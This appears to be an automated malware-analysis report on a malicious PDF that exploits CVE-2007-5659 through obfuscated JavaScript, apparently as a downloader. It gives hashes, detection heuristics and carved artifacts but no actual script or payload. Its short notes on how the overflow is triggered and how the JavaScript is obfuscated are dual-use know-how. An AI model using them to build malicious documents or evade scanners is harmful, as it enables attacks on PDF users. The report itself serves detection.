Malicious PDF — malware analysis report

Static analysis result for SHA-256 721ae3675657174b…

Verdict: MALICIOUS
File type: PDF
Size: 1.17 MB
Created: 2009-12-17 03:14:38 +08:00
Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows))
MD5: c236e6b6e3326eecc110824e8346239d
SHA-1: 86c0a971a3415b2d7d0c8a250b830d8ad7e9434e
SHA-256: 721ae3675657174b521c5cc1cbfe0873694a5a764395636873e166a5f427ad63
Risk score: 160

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF sample contains embedded JavaScript that targets the Collab.collectEmailInfo vulnerability (CVE-2007-5659). The JavaScript is heavily obfuscated but appears to be a downloader for a second-stage payload. The ML classifier strongly flagged this PDF as malicious, consistent with exploitation of a known vulnerability.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9980

Heuristics (8)

  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; CVE match: exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • Generic recovered JavaScript exploit stage (severity: high; rule: PDF_GENERIC_STAGE_RECOVERY)
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action (severity: low; 1 related finding; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file (severity: low; rule: PDF_EMBEDDED)
    PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • Object number defined twice with different bodies (severity: info; rule: PDF_DUPLICATE_OBJ_BODY_INCREMENTAL)
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found:
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
    • http://ns.adobe.com/pdf/1.3/ (in PDF document text)
    • http://ns.adobe.com/xap/1.0/ (in PDF document text)
    • http://purl.org/dc/elements/1.1/ (in PDF document text)
    • http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Artifact 1
Filename: k1
SHA-256: d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7
Kind: pdf-embedded-file
Source: PDF EmbeddedFile object 26 at offset 0x1EC1
Size: 1206312 bytes
Detection (ClamAV): No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.

Artifact 2
Filename: javascript_obj0031_000.js
SHA-256: 60bd7206c1c33ef4367ed7c166ac9c3d2f8ff348271c73a0d2ef543f02957c23
Kind: pdf-javascript-stream
Source: PDF /JS object 31 at offset 0x12B202
Size: 7601 bytes
Detection (ClamAV): No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Artifact 3
Filename: generic_stage_recovery_000.js
SHA-256: 1aee69bde63deb6f12053eb15ee5b0f1c681c460bbd4b79c81dd08757303d3fe
Kind: deobfuscated-js
Source: generic stage recovery (split-literal-normalize) from JavaScript object 31 at offset 0x12B202
Size: 7157 bytes
Detection (ClamAV): No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script